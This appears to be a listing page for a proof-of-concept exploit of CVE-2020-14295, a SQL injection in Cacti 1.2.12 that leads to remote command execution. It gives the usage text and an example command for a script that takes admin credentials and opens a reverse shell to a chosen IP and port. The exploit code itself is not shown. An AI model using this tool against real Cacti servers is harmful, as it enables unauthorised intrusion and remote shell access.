
CVE-2020-14295 PoC — Cacti SQL Injection Vulnerability

Associated Vulnerability
Title: Cacti SQL Injection Vulnerability (CVE-2020-14295)
Description: A SQL injection issue in color.php in Cacti 1.2.12 allows an admin to inject SQL via the filter parameter. This can lead to remote command execution because the product accepts stacked queries.
Description
Authenticated SQL injection to command execution on Cacti 1.2.12 
Readme
# CVE-2020-14295
***
Vulnerability details - https://github.com/Cacti/cacti/issues/3622

## Install
`pip3 install -r requirements.txt`

## Usage 
```
$ ./gimme-a-shell.py --help
usage: gimme-a-shell.py [-h] -t Target -U Username -P Password -i Shell-IP -p Shell-Port

optional arguments:
  -h, --help     show this help message and exit

required arguments:
  -t Target      Target URL
  -U Username    Cacti username
  -P Password    Cacti password
  -i Shell-IP    Reverse-Shell IP
  -p Shell-Port  Reverse-Shell Port
```
## Example 
`./gimme-a-shell.py -t http://cacti.localhost -U admin -P admin -i 127.0.0.1 -p 9001`
File Snapshot

```
[4.0K] /data/pocs/b9eda427ce31b0f2b47675138286c2176f64848d
├── [3.9K] gimme-a-shell.py
├── [ 34K] LICENSE
├── [ 621] README.md
└── [ 8] requirements.txt

0 directories, 4 files
```